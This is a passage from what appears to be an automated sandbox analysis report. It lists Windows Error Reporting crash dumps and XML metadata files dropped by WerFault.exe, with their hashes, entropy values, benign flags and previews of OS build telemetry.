Entropy (8bit):	3.7030641057700384
Encrypted:	false
SSDEEP:	192:R6l7wVeJM1F76DygqYE6Y2DgSUZIbgmf71eUpBa89bdGYsfck/cm:R6lXJ6p6Dyga6YtSUSbgmfJeQMLfce
MD5:	E67BB99CFF0BB6BDA777B295D3652CDA
SHA1:	975A2B8E783A79B4D7F8E3675283A58841D52310
SHA-256:	D3BC3201172374D89E1C515A52743ABC0EAD3F49FD3BCB5BF6BDA242D0A27BF0
SHA-512:	8EEF9663C463755247BC5B342A57AE2BECD876C8557EB89337880131094D6BC4DEBFAF12A5328DB4EBCE307198D963A557C62D7FCDB75351A7D455449D3FAD91
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8690.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.496674250290032
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VYAYm8M4JcN0Fx++q82F2axhQd:uIjfEI7eK7VUJcS+BUaxhQd
MD5:	75D6388B8D11BFAC9A457901B359756F
SHA1:	47A5F02B50ACA9D9E1B0DC83306EF10F86BB4C66
SHA-256:	916904F8A5283291718D3925222CF9B2DD354DB2351487E8C955F977C4DF15A7
SHA-512:	28ACFDD4E22D057FCB1BA82D2028D175E0FC9EEF5673EDF7DE8E4FAD289B698775CD9A80A3B243C9CAF03B3C9F5C15334174CA09848C2049A8B660E62B7282C2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A47.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 27 12:19:05 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	106818
Entropy (8bit):	1.9938209318013513
Encrypted:	false
SSDEEP:	384:bGswIEpWNb/dzpVO/3OYBal6fjlinMTnOry58S3/yVDY5O81pH:Jwd0b/dzpVO2QaAblbzCyTkcZp
MD5:	42881F6AA02DF047D6D33BCC110976F3
SHA1:	75782DDD7135C7035F0A75A7D3F9F68F3337ADB6
SHA-256:	D17187B705ECC37769AF2AFCD85E911776FC1065366481701A87F3035C5E171E
SHA-512:	97D8B8B8C82C34FC1FC91ECF70B2DC3874003694D31AF150F1B6C61074E9703F11C7847874517AA3F2E9678119073D52B2AC702B39414B464F29E9C14D08CC7A
Malicious:	false
Preview:	MDMP..a..... .......9..f............D...............X.......<...$ ...........M..........`.......8...........T............,...t..........` ..........L"..............................................................................eJ......."......GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BCF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8368
Entropy (8bit):	3.7035066061178274
Encrypted:	false
SSDEEP:	192:R6l7wVeJM1F56oW6Y2DBSUYdGgmf71eUpBM89bdUYsfHeW/Cm:R6lXJ6r676YMSUoGgmfJea+Lfd
MD5:	981EB71FCB6D09DDEC18023813B79BCD
SHA1:	83FCBD346161FB48B851B5C3C2FED79B5C73AC67
SHA-256:	8C1EC7B26194AF5C0EE760102120FE9E3040ABA40A624DF0448C18FC4F90702F
SHA-512:	2069FB36F3923330982F6E28A781BBB367AB5E3D6B6F92F54B1CF013EF0223250DC8A67C3A3A5F3BE709A7B629F8FF8F2D23BFAD4B99310F6FCD9CFD51F7AF11
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BFE.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.492370603839785
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VY4Ym8M4JcN0FECd+q82F2axhQd:uIjfEI7eK7VAJcloBUaxhQd
MD5:	D0C9BC703915AC702B35E5A611F9F65C
SHA1:	4200E402AAD326C785B86C0E064FBD4F92D6780C
SHA-256:	C10A20BD612FAD07033259370BFBF0735505D343F849585EAB579CF87C9FABD7
SHA-512:	53396D75BFFF77E9B437B38EB133240A70F1F434281E2CFADDDE31DA153977C6A20CE511602A3C24E2BD3F2F74BC99B3FF31BB1D984E27B9CF7715AAE3F91AC7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER90CF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 27 12:19:07 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	42662
Entropy (8bit):	2.5100191570201837
Encrypted:	false
SSDEEP:	384:VvMgYYBqdzpVosSYHPy3/4EsufAsYG0f:+xoqdzpVUI2BsBsu
MD5:	571767F3DB234DE5D6F628FC2644CD08
SHA1:	60696AA025A6047DD234B0F5E34582A3DBC3C113
SHA-256:	5BA7B51E4BE6112B608678271EAEBEA76D05F441A0F524909C89536627B72D83
SHA-512:	562753DD48C56FE27AA55862EE7C011DB2405D9B496F21E772990E302FF0852F6E5DCCDC45059EF670029AE33DCE3A4C2130C224581CEF5A58CFD428EE263BB8
Malicious:	false
Preview:	MDMP..a..... .......;..f............4...............H.......<....#......T....4..........`.......8...........T...........X:..Nl..........8$..........$&..............................................................................eJ.......&......GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9276.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8372
Entropy (8bit):	3.7018848347213464
Encrypted:	false
SSDEEP:	192:R6l7wVeJM1Ff606Y2DQSUasDgmf712/+pDw89bdRbYsfZ/Rjm:R6lXJ6N606Y9SUawgmfJ22TbLfX6
MD5:	B3D3333612F32664CBCEA10650452C96
SHA1:	15947005A807585DE858A2985F7C8DFCB4CE196C
SHA-256:	6D740243242B15E8BC65C64D547A028C6A21A4628802F2232F2E04E605B2D6E3
SHA-512:	CDD1F87A93D3AD5E1AFAE83F69B38D56AF5E7E8A3F4F1DFCF4E7D07B53C8AA4B4D9CABB9166D8F8F495EAB7A5E39B52D15C47E817C68CBA09C77271605DD479C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9296.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4633
Entropy (8bit):	4.495009137659906
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VYzYm8M4JcNkOqFj+q825COyaxhQd:uIjfEI7eK7VLJcmfBAdaxhQd
MD5:	789D0DC3CD72E6D9BFE02BCB022B7CE3
SHA1:	A7BB370659713AF95FD1513DED779CFB86A3F402
SHA-256:	3E5B75D4C6960CDC7234761E18A36306EE906A5F023A624DE3DEC66D88161DA3
SHA-512:	F7FAB5EA04C27715A192BC2CEB377627ABE1E23F346CDB4A401C32699303AB371096528F3A00557DB0D67D54A28EC7CDD5087F9C0436881B2FA378C8CB888BA5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB445.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Aug 27 12:19:16 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	56144
Entropy (8bit):	1.7801149401475562
Encrypted:	false
SSDEEP:	192:1a4sGXS3tZNqOzZ5hnWr4dcJ3GUuXHhte/PL+d7V8GH3/6unhw+zUz:o4mtZN1zZrWMdcJBoAPLiRt3/ThwV
MD5:	B044B787D9DF5DB9D5DD9572438F9025
SHA1:	3040A703A083B7B4453F42BF812E38D1CBABB562
SHA-256:	2A88C199AA3F481FBD0C9E595DCBDE5FF60C0EDDBC50BE1D15F483E0111CDFB5
SHA-512:	47AAA471BB58616870FB776C5A24C3E4FB656D043CB3B8A2E48CD94659E84DA1642B9255B60D848ECF4B534371B4FBA0C4691A702A71F8198B06D3D9774BFC6E
Malicious:	false
Preview:	MDMP..a..... .......D..f............$...............,.......t...,,..........T.......8...........T...........h...............(...........................................................................................eJ..............GenuineIntel............T...........:..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4C3.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6308
Entropy (8bit):	3.727897336257151
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbzL6pPo3YdxFXgMC5aMOURC89bdF/sfFHD/9m:R6l7wVeJzL6MY7UpBRC89bdF/sfFj/9m
MD5:	6F5D647D559CEC62B143A817044196AD
SHA1:	A50997673028E19920557813A6928658888284EB
SHA-256:	CFD37FAB6F30B0503661F6626F0BEB8AB1C46D621F99BBB211833237B7986B37
SHA-512:	FB5C3ABEBBC81A88BBCDB20645D952BB596B49964A31531910EE63FD6E0FD6A8C6253153FC239F0A4B799EB887148A50BC2B946E768EEB3D70799C977899C175
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4E3.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.484788357308587
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VYtYm8M4J8N0F3+q8xFxWqN9d:uIjfEI7eK7VZJ8omTWqN9d
MD5:	A7ED2C881FAE9D41E6C5DA7CD4B68F94
SHA1:	07F0C79958137061D3CDDAE00EF4AB8F7F16DCE7
SHA-256:	4BEF83C784CD27A77A1206CDB6D500DEF30536EE1643AE579C7458050CE75F74
SHA-512:	C4C9A60072812D56A9FF0333F8E5D661A939FB1EE5DF6247A5925CEAEF04D67DACD1CE216A833D8FCDBC9EE620A9D770A5BF8C33AB852FB5D347703709F1AA08
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8F8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Aug 27 12:19:17 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	58832
Entropy (8bit):	1.8725105519370093
Encrypted:	false
SSDEEP:	384:IJtZBetzaErpWMdc0B44EhoPRt3/jpmkjkC:IJPUtzXre0B8hcRR7hjkC
MD5:	AFEE3726CD044B7BC47189DD0203B4F1
SHA1:	402A5FE9B4D068BB0A7612212C782169211DA989
SHA-256:	4A9C220B9CC92EA9058426163D8BFFA8B9893E2AC94985A8AAF2192FB026DFFA
SHA-512:	D853132B616ACDB40A439ED22C7C8F0DB87DFD1140EA120A91E57611C20DAC1C253E45130A57A6160AA09A51D8071B19129BDD6EA03F3F3A56E7FA4398653DB3
Malicious:	false
Preview:	MDMP..a..... .......E..f............$...............,.......t...,,..........T.......8...........T...........h...h...........(...........................................................................................eJ..............GenuineIntel............T...........:..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB947.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6324
Entropy (8bit):	3.7309073205768617
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbz06St8YdxFXgMC5aMOUYf89bd8/sf8/6m:R6l7wVeJz06DY7UpBW89bd8/sf8/6m
MD5:	20913A2D56229F8BCEA6DCC863A131A9
SHA1:	BD3288355E4B993719FB6D83F9F8839B630B636F
SHA-256:	9CB9EAD310A2C6D3DB3C607611653F4E3F1A10052EB6BA16C7167AA9B67DCE3C
SHA-512:	4B30E9D7059C8835711D4673390299386B7BADA591F55DB517B87B7EA94018F486E93C189D4A91CFC18A715FD3A8B186324EA5EC03F79A33A7D95CD66E04E4A7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB967.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.482556623538586
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VYKYm8M4J8N0Fcm+q8xFxWqN9d:uIjfEI7eK7VaJ8DmmTWqN9d
MD5:	3F542DA43C867526B9F3C92775357A94
SHA1:	25A80584BB98C57DF4B85AE4254BDB78B4004596
SHA-256:	1A5FAE46CCCC3CAD06CB142EF8BBE3B3BFC03342D750515EC46939C927AC75F6
SHA-512:	563792B9AC3DCF564B1CBE1629FC4D8D84CB6590920AE03E45A459B799BB2BA44C9A7936DAFFCB1609EFA2C2CFDD7073F43B8C3A5B2064DFB37D19F13E69C5DD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBAFC.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Aug 27 12:19:18 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	61710
Entropy (8bit):	2.0382220787333876
Encrypted:	false
SSDEEP:	192:7QJPXusEMqOzdw3xBjb+HXer4dcXvGUAenCkxItrxtKV8GH3/6z6n+NxCEKN8cVc:8EM1z2jmeMdcXZ1JeBwt3/Q0+NxaNnK
MD5:	2500BABADB7124B53E90FBFE69FADBBF
SHA1:	63049F148E7B4BA643FE2D73B5922FF5B0E0AD89
SHA-256:	A17DB29A1D8E6612E6B2DE53841E2FAA2E38F296EEFFD320589B4E0A8364D03E
SHA-512:	C5AB11AF01E2521EF4FF4BDE21447026CE5703B92BADC810A00D94B1638ED6B1CC197B1FF6C9A3211AFD0D3A8962670036A859D7EF279A8F147DB5D6577A58D0
Malicious:	false
Preview:	MDMP..a..... .......F..f............$...............,...........<-..........T.......8...........T...............f.......................................................................................................eJ..............GenuineIntel............T...........:..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB6A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6324
Entropy (8bit):	3.7328509857595145
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbzJ6oykYdxFXgMC5aMOUA89bdb/sfC0T/jm:R6l7wVeJzJ6ohY7UpBA89bdb/sfN/jm
MD5:	5FABDC329BCD199AED7054CEE69764C5
SHA1:	4F90EFAD88FC2AB6B2A2F77F835477ADAC6F21A0
